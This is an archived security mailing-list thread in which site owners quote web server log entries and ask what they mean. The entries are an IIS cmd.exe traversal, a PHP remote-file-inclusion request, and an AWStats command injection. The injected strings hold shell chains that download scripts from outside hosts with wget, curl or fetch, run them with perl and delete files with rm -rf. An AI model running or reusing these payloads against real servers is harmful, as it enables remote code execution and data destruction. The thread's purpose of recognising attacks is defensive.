Hi all,
I have noticed that same messages turning up in my server logs as well. I
have also noticed a number of other odd entries as well such as the
following:
2005-10-21 14:18:09 192.168.2.100 GET
/scripts/..%5c%5c../winnt/system32/cmd.exe /c+dir 80 - 66.7.71.83 - 404 0 64
2005-10-21 02:09:22 192.168.2.100 GET /web-hints/env.cgi - 80 - 58.51.133.21
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.1) 404 0 3
As well as a number of long entries such as the following.
2005-10-23 08:59:10 192.168.2.100 GET /inc/tell_a_friend.inc.php
script_root=http://82.165.168.163/catalog/images/fbi.gif?&cmd=cd%20/tmp;wget
%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;curl%20
-
O%20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;fetch%
20http://82.165.32.233/images/sess_3539283e27d73cae29fe2b80f9293f60;perl%20s
ess_3539283e27d73cae29fe2b80f9293f60;rm%20-rf%20sess* 80 - 211.38.128.10
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+98) 200 0 0
I am just wondering what these entries mean. I can guess what the first two
mean but I want to make sure that I am not going to be compromised.
Thanks in advance,
Brad
http://bradmetz.zapto.org
-----Original Message-----
From: Can't dig that daddy [mailto:cdtdaddy@hotmail.it]
Sent: Monday, October 24, 2005 12:02 PM
To: security-basics@securityfocus.com
Subject: Re: GET //awstats.pl? in apache logs
Alle 21:33, venerdì 21 ottobre 2005, Konstantine ha scritto:
My apache logs show rows after rows of following, all from various IP
addresses. This started a couple of days ago. I don't have awstats.
Could somebody tell me what is that? Is there anything I should be
doing? thanks.K.
GET
//awstats.pl?configdir=|echo%20;cd%20/tmp;rm%20-rf%20*;curl%20-O%20http://w
ww.geocities.com/kidk1d/a.pl;perl%20a.pl;echo%20;rm%20-rf%20a.pl*;echo|
HTTP/1.1
Bad news:
http://packetstormsecurity.nl/0501-exploits/AWStatsVulnAnalysis.pdf
